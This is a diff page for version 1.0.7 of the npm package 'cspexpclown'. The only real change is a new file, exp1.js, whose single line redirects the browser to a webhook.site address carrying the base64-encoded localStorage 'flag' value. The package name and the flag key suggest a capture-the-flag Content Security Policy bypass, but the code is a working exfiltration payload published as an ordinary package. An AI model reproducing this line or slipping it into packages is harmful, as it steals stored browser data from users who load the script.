cspexpclown 1.0.6 → 1.0.7

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/exp1.js +1 -0
  2. package/package.json +1 -1
package/exp1.js ADDED
@@ -0,0 +1 @@
1
+ window.location.href="https://webhook.site/78bd37ea-0ee3-4993-8b97-b607846ab241/?flag="+encodeURIComponent(btoa(localStorage.getItem("flag")))
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "cspexpclown",
3
- "version": "1.0.6",
3
+ "version": "1.0.7",
4
4
  "description": "csp",
5
5
  "main": "index.js",
6
6
  "scripts": {